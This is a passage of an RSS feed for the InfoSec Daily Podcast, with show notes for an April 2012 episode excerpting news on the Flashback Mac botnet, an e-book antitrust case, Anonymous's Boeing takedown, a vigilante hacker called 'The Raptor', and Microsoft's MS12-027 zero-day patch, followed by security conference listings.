<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple has announced that it is developing software to detect and destroy the Flashback malware that security insiders claim has infected 600,000 Macs worldwide.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mac-only Flashback malware exploits a Mac Java vulnerability. It has created a worldwide botnet by exploiting an unpatched this Java vulnerability.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple has already released updates to patch the flaws, but is now working on software updates to remove Flashback too.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yesterday we reported a quick way to check whether your Mac is infected by Flashback, courtesy of a free app called Flashback Checker.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a support document released yesterday Apple mentioned its upcoming Flashback killer tool.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In addition to the Java vulnerability, the Flashback malware relies on computer servers hosted by the malware authors to perform many of its critical functions.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Apple is working with ISPs worldwide to disable this command and control network,&quot; said Apple.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple has also advised Mac users running Mac OS X 10.5 or earlier to disable Java in their browser preferences.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier in the day Apple had apparently targeted the servers of the Russian security firm that first revealed the malware, accusing Dr. Web of being &quot;involved in a malicious scheme&quot; and its servers being in &quot;command and control&quot; of Flashback.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.businessweek.com/news/2012-04-11/apple-bofa-settlement-facebook-cordray-speech-compliance"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.businessweek.com/news/2012-04-11/apple-bofa-settlement-facebook-cordray-speech-compliance</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple Inc. and the publisher Macmillan could be sued as soon as today by the U.S. Justice Department over alleged collusion in the pricing of e-books, according to two people familiar with the matter.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple and Macmillan, which have refused to engage in settlement talks with the Justice Department, deny they colluded to raise prices for digital books, the people said. In an antitrust case, they will argue that pricing agreements between Apple and publishers enhanced competition in the e-book industry, which was dominated by Amazon.com Inc. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Justice Department is probing how Cupertino, California-based Apple changed the way publishers charged for e- books on the iPad, a person familiar with the matter said last month. The Justice Department&rsquo;s antitrust division told Apple and five publishers that it&rsquo;s preparing to sue them for allegedly fixing the prices of electronic books, a person familiar with the matter told Bloomberg News March 8.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CBS Corp&rsquo;s Simon &amp; Schuster, Lagard&egrave;re SCA&rsquo;s Hachette Book Group and News Corp&rsquo;s HarperCollins are seeking to avoid a costly legal battle and could reach a settlement as soon as today, two people familiar with the matter said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. is still leaving the door open for last-minute settlement discussions this week, a person familiar with the situation said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.securitynewsdaily.com/1718-anonymous-boeing-hack.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitynewsdaily.com/1718-anonymous-boeing-hack.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous is taking responsibility for launching a coordinated cyberattack on Boeing&#39;s website, a high-profile takedown that&#39;s part of the hacking collective&#39;s campaign against what it believes is a stifling piece of federal legislation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous announced &quot;Tango Down boeing.com by #Anonymous for #OpDefense&quot; on its</span><a href="https://twitter.com/#%21/YourAnonNews"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">YourAnonNews Twitter feed</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> at about 3:45 p.m. EDT Tuesday (April 10). Boeing&#39;s website was down for most of the following two hours, returning at about 5:40 p.m. ET, but was having trouble again Wednesday morning (April 11).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.foxnews.com/us/2012/04/10/grandpa-patriot-who-goes-by-raptor-claims-credit-for-taking-down-al-qaeda/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.foxnews.com/us/2012/04/10/grandpa-patriot-who-goes-by-raptor-claims-credit-for-taking-down-al-qaeda/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://th3raptor.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://th3raptor.wordpress.com/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An American hacker, who calls himself &ldquo;The Raptor&rdquo; and claims to be a grandfather waging his own war on terror, is taking credit for a series of takedowns of online forums used by Al Qaeda sympathizers, FoxNews.com has learned.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Calling himself a patriot acting on behalf of U.S. troops serving overseas, The Raptor claims to be behind last month&rsquo;s attack on Al Qaeda&rsquo;s main online forum, Shamukh Islamic Network, and a handful of other sites and forums, including Ansar al-Mujahideen, where jihadists gather online to issue threats and exhort one another to acts of terror. The sites went down on March 22, and most remained dark for nearly two weeks. As the websites stayed offline, The Raptor taunted his targets on Twitter, daring them to &ldquo;bring it.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Bow. Wave. Exit Stage Right. Curtains. Applause,&rdquo; he tweeted after Shamukh, the main site used to blast out Al Qaeda content, was taken out of commission, only to return days later with a message blaming the outage on &ldquo;Enemies of Allah.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the online world, where posters and hackers alike take on false personas and play a virtual game of cat and mouse, it is difficult to know if The Raptor is who he says he is, someone simply claiming credit, or if the hack attacks are part of some larger, government-related operation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Who is taking it down is an interesting question, but does it matter?&rdquo; asked Jeff Bardin, cyberterror expert and former Air Force Arabic linguist who is now a principal at the private intelligence firm Treadstone 71.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If experts can&rsquo;t be sure who is taking the jihadist sites down, it is unlikely the extremists who run them and post on them can, either. But it is all but certain they&rsquo;ve been stung by the taunts of someone calling himself The Raptor, or as his Twitter handle is spelled, &ldquo;th3raptor.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9226060/Microsoft_patches_critical_Windows_zero_day_bug_that_hackers_are_now_exploiting"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9226060/Microsoft_patches_critical_Windows_zero_day_bug_that_hackers_are_now_exploiting</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft today delivered six security updates to patch 11 vulnerabilities in Windows, Internet Explorer (IE), Office and several other products, including one bug that attackers are already exploiting.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company also issued the first patch for</span><a href="http://www.computerworld.com/s/article/9224757/Microsoft_ships_Windows_8_Consumer_Preview"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Windows 8 Consumer Preview</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the beta-like build Microsoft released at the end of February.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But it was MS12-027 that got the most attention today.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Things got a bit more interesting today,&quot; said Andrew Storms, director of security operations at nCircle Security, &quot;because Microsoft is reporting limited attacks in the wild.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Flaws that attackers exploit before a patch is available are called &quot;zero-day&quot; vulnerabilities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The single vulnerability patched in</span><a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-027"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">MS12-027</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> is in an ActiveX control included with every 32-bit version of Office 2003, 2007 and 2010; Microsoft also called out SQL Server, Commerce Server, BizTalk Server, Visual FoxPro and Visual Basic as needing the patch.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Storms, other security experts and Microsoft, too, all identified MS12-027 as the first update users should install.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers are already using the vulnerability in malformed text documents, which when opened either in Word or WordPad &#8212; the latter is a bare bones text editor bundled with every version of Windows, including Windows 7 &#8212; can hijack a PC, Microsoft acknowledged in a post to its</span><a href="http://blogs.technet.com/b/srd/archive/2012/04/10/ms12-027-enhanced-protections-regarding-activex-controls-in-microsoft-office-documents.aspx"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Security Research &amp; Defense</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (SRD) blog today.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We list MS12-027 as our highest priority security update to deploy this month because we are aware of very limited, targeted attacks taking advantage of [the] CVE-2012-0158 vulnerability using specially-crafted Office documents,&quot; said Elia Florio, an engineer with the Microsoft Security Response Center, in the SRD blog post.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft did not disclose when it first became aware of the attacks, or who reported the vulnerability to its security team.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Storms speculated that an individual or company had been attacked, uncovered the bug and notified Microsoft.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-643-pentestlessons-apple-snub-flashback-tool-e-book-price-fixing-boeing-th3raptor-and-ms-0-day/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3757/0/infosec-daily-podcast-episode-643.mp3" length="16096948" type="audio/mpeg" />
		<itunes:duration>0:33:29</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 643 for April 11, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.oute[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 643 for April 11, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.forbes.com/sites/andygreenberg/2012/04/09/apple-snubs-firm-who-discovered-mac-botnet-tries-to-cut-off-its-server-monitoring-infections/
Until it was revealed last week that more than half a million Macs were infected with Flashback malware, Apple had little experience working with the community of security researchers who aim to dissect and shut down botnets. &#160;And according to the firm that discovered this new outbreak, it could use a lesson in teamwork.
Boris Sharov, chief executive of the Moscow-based security Dr. Web says he learned Monday from the Russian Web registrar Reggi.ru that Apple had requested the registrar shut down one of its domains, which Apple said was being used as a &#8220;command and control&#8221; server for the hundreds of thousands of PCs infected with Flashback. In fact, that domain was one of three that Dr. Web has been using as a spoofed command and control server&#8211;what researchers call a &#8220;sinkhole&#8221;&#8211;to monitor the collection of hijacked machines and try to understand their behavior, the technique which allowed the firm to first report the size of Apple&#8217;s botnet last week.
&#8220;They told the registrar this [domain] is involved in a malicious scheme. Which would be true if we weren&#8217;t the ones controlling it and not doing any harm to users,&#8221; says Sharov. &#8220;This seems to mean that Apple is not considering our work as a help. It&#8217;s just annoying them.&#8221;
Sharov believes that Apple&#8217;s attempt to shut down its monitoring server was an honest mistake. But it&#8217;s a symptom of the company&#8217;s typically tight-lipped attitude. In fact, Sharov says that since Dr. Web first contacted Apple to share its findings about the unprecedented Mac-based botnet, it hasn&#8217;t received a response. &#8220;We&#8217;ve given them all the data we have,&#8221; he says. &#8220;We&#8217;ve heard nothing from them until this.&#8221;
&#160;
In Apple&#8217;s defense, it may n[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 642 &#8211; End of Support, DoNotTrack, Console Spies, Global Payments Expulsion, AnonChina and Missing the Basics</title>
		<link>http://www.isdpodcast.com/episode-642-end-of-support-donottrack-console-spies-global-payments-expulsion-anonchina-and-missing-the-basics</link>
		<comments>http://www.isdpodcast.com/episode-642-end-of-support-donottrack-console-spies-global-payments-expulsion-anonchina-and-missing-the-basics#comments</comments>
		<pubDate>Wed, 11 Apr 2012 00:58:28 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3750</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 642 for April 10, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; [...]]]></description>
			<content:encoded><![CDATA[<h1 dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 642 for April 10, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.</span></h1>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
